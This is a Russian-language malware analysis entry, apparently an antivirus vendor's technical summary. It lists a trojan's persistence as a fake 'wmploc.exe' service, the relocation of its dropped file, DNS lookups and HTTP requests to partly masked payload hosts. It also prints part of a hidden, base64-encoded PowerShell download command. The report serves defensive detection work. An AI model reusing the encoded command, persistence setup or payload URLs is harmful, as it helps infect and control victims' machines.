Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\wmploc] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\wmploc] 'ImagePath' = '"%WINDIR%\SysWOW64\Dism\wmploc.exe"'
- 'wmploc' "%WINDIR%\SysWOW64\Dism\wmploc.exe"
- 'wmploc' %WINDIR%\SysWOW64\Dism\wmploc.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAEYAVgBYAEkAawBsAHcAPQAnAFQATgBaAFUAWABmAG4AbQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYABjAFUAUgBJAHQAeQBQAHIAbwBgAFQATwBDAE8AbAAiACAAPQAgAC...
- %HOMEPATH%\768.exe
- %WINDIR%\syswow64\dism\wmploc.exe
- %HOMEPATH%\768.exe в %WINDIR%\syswow64\dism\wmploc.exe
- '17#.#02.48.180':80
- http://co####expuebla.org/documentos/k_n_iv8ku/
- http://17#.#02.48.180/vBMpL/EEvf2gZkPgKjGe/
- DNS ASK da#####hiphopcity.com
- DNS ASK co####expuebla.org
- '%HOMEPATH%\768.exe'
- '%WINDIR%\syswow64\dism\wmploc.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAEYAVgBYAEkAawBsAHcAPQAnAFQATgBaAFUAWABmAG4AbQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYABjAFUAUgBJAHQAeQBQAHIAbwBgAFQATwBDAE8AbAAiACAAPQAgAC...' (со скрытым окном)